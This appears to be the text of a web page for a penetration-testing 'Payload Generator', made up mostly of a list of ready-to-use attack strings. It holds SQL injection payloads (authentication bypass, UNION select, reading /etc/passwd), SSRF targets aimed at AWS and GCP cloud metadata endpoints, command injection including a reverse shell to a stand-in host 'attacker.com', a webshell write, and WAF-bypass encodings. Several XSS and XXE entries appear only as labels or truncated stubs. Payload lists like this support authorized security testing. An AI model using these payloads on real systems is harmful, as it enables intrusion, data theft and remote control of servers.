💣 Payload Generator
Generate and customize attack payloads for various vulnerability types. Select vulnerability type, encoding options, and context to generate targeted payloads.
Legal Notice: Only use these payloads in authorized penetration tests or security assessments with explicit permission. Unauthorized use is illegal.
⚙️ Generate Payloads
SQLi - Basic Detection
'
SQLi - Auth Bypass
admin'--
SQLi - Union Select
' UNION SELECT NULL--
SQLi - Time-Based (MySQL)
' AND SLEEP(5)--
SQLi - File Read (MySQL)
' UNION SELECT LOAD_FILE('/etc/passwd')--
XSS - Basic Script
XSS - Image Onerror
XSS - SVG Onload
XSS - Cookie Steal
XSS - Polyglot
javascript:/*-->x" onmouseover=alert(1)//>
SSRF - Localhost
http://localhost/
SSRF - AWS Metadata
http://169.254.169.254/latest/meta-data/
SSRF - IPv6 Localhost
http://[::1]:8080/
SSRF - GCP Metadata
http://metadata.google.internal/computeMetadata/v1/
XXE - File Read
]>
XXE - Blind SSRF
]>
XXE - Billion Laughs
]>
Command - Ping
; ping -c 3 attacker.com
Command - Reverse Shell
; bash -i >& /dev/tcp/attacker.com/4444 0>&1
Command - File Write
; echo '' > shell.php
WAF - Comment Obfuscation
UN/**/ION SEL/**/ECT
WAF - Case Variation
WAF - Double URL Encode
%2527 (single quote)
Pro Tips:
- Test payloads in isolated environments first
- Combine multiple encoding techniques for WAF bypass
- Use Burp Suite's Intruder for automated payload testing
- Check specific framework documentation for targeted payloads